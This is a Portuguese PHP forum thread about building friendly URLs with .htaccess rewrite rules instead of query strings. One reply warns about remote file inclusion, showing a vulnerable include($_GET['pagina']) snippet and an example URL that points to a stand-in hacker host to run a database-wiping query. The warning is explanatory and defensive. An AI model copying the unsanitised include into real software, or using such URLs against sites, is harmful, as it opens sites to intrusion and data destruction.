Jump to content

Sistema De Páginas Php


Recommended Posts

Olá pessoal!

Vejo em muito sites, independente do gênero, a utilização da função $_GET para a formulação dos links. Exemplo: "index.php?pagina=contato".

Estou com um projeto em mente, e gostaria de quebrar este "padrão".

Gostaria de saber como faço para criar links como por exemplo "www.site.com.br/servidores/vps"

Já vi esta função no WordPress, onde é utilizado "www.site.com.br/01/02/2012/postagem"

Alguem tem idéia de como posso fazer isso?

Abraço!

Link to comment
Share on other sites

Amigo, a maioria dos sites utiliza _GET e é a melhor maneira a se fazer.

Na página, ex.: "pagina.php?uid=$" faça uma comparação com o 'UID' digitado no banco de dados, se existir você imprime o conteúdo, caso contrário inclui ou redireciona para uma página 404, e verifique se ele digitar, se estiver em branco já sabe o que deve fazer!

Mas para contornar este padrão utilize '.htaccess', você pode muito bem 'criar um novo nome' pra essa página. Vai um exemplo de .htaccess.


RewriteEngine On

RewriteRule ^pagina\/([^/]*)\.htm$ /pagina.php?nomeunico=$1 [L]

No exemplo acima, ativo a função 'rewrite' e logo crio a regra pra uma página, no caso a página é 'pagina.php' eu identifico via $_GET porém através do nome dela, tem como formatar o ID dela e recuperar pelo nome, mas é algo mais complicado e desnecessário.

Sempre a pessoa digitar 'site.com.br/pagina/nome.html' ele vai enteder que a pessoa está tentando acessar 'site.com.br/pagina.php?nomeunico=nome' (:

Espero ter ajudado.

Link to comment
Share on other sites

Amigo, a maioria dos sites utiliza _GET e é a melhor maneira a se fazer.

Essa é a pior maneira de se fazer. Você está abrindo uma brecha sem precedentes em seu website.

Imagine que seu código seja algo assim:


<?php


$pagina = $_GET['pagina'];

include($pagina.'php');

blablalblallablba

?>

E se um hacker olocar ali uma URL, acessando assim: www.xx.com.br/index.php?pagina=http://sitehacker.com/destruir-bd Dentro da URL do hacker bastaria ter uma funçao tal qual:

<?php


mysql_query ("FERRAR BD ")


?>

Link to comment
Share on other sites

Essa é a pior maneira de se fazer. Você está abrindo uma brecha sem precedentes em seu website.

Imagine que seu código seja algo assim:


<?php


$pagina = $_GET['pagina'];

include($pagina.'php');

blablalblallablba

?>

E se um hacker olocar ali uma URL, acessando assim: www.xx.com.br/index.php?pagina=http://sitehacker.com/destruir-bd Dentro da URL do hacker bastaria ter uma funçao tal qual:

<?php


mysql_query ("FERRAR BD ")


?>

Não não João,

A maneira que eu expliquei é recuperada através de banco de dados, se o que foi digitado não existir no banco, não há nada que se possa fazer além de técnicas um tanto quanto simples de conter SQL Injection. (:

Creio que todo código é o melhor à se fazer, mas tem que saber deixar ele seguro e otimizar o mesmo.

Link to comment
Share on other sites

Não não João,

A maneira que eu expliquei é recuperada através de banco de dados, se o que foi digitado não existir no banco, não há nada que se possa fazer além de técnicas um tanto quanto simples de conter SQL Injection. (:

Creio que todo código é o melhor à se fazer, mas tem que saber deixar ele seguro e otimizar o mesmo.

Exatamente, tem que saber previnir. Essa vulnerabilidade saiu na Oswap 2007 e na Oswap 2011.

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...